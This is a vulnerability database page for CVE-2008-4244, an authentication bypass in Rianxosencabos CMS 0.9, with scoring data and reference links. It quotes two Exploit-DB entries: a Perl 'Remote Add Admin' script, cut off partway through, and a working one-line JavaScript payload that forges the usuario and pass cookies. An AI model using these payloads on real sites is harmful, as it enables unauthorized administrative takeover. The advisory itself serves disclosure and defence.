CVE-2008-4244
Published 2008-09-25
CVE-2008-4244: Rianxosencabos CMS 0.9 allows remote attackers to bypass authentication and gain administrative access by setting the usuario and pass cookies to 1.
Priority P353, high, 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.86% (85.0th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rianxosencabos_cms | rianxosencabos_cms | — | — |
No detection rules found.
Exploit-DB
Rianxosencabos CMS 0.9 - Remote Add Admin
exploitdb·2008-09-24
---
#!/usr/bin/perl -w
# Rianxosencabos CMS 0.9 Remote Add Admin Exploit
# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
# written by ka0x
# D.O.M Labs - Security Researchers
# - www.domlabs.org -
use LWP::UserAgent;
my ($host, $login, $pass, $mail, $user_id) = @ARGV ;
unless($ARGV[4]){
print "[*] usage: perl $0 \n";
print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n";
exit 1;
}
if ($host !~ /^http:/){ $host = 'http://'.$host; }
my $ua = LWP::UserAgent->new() or die ;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout(10) ;
sub __CREATE {
my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;
$req->conten
Exploit-DB
Rianxosencabos CMS 0.9 - Insecure Cookie Handling
exploitdb·2008-09-21
---
###############################################################################################
[+] Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my friends
################################################################################################
---
exploit:
javascript:document.cookie = "usuario=1; path=/"; document.cookie = "pass=1; path=/";
# milw0rm.com [2008-09-21]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4312
http://www.securityfocus.com/bid/31292
https://exchange.xforce.ibmcloud.com/vulnerabilities/45291
https://www.exploit-db.com/exploits/6521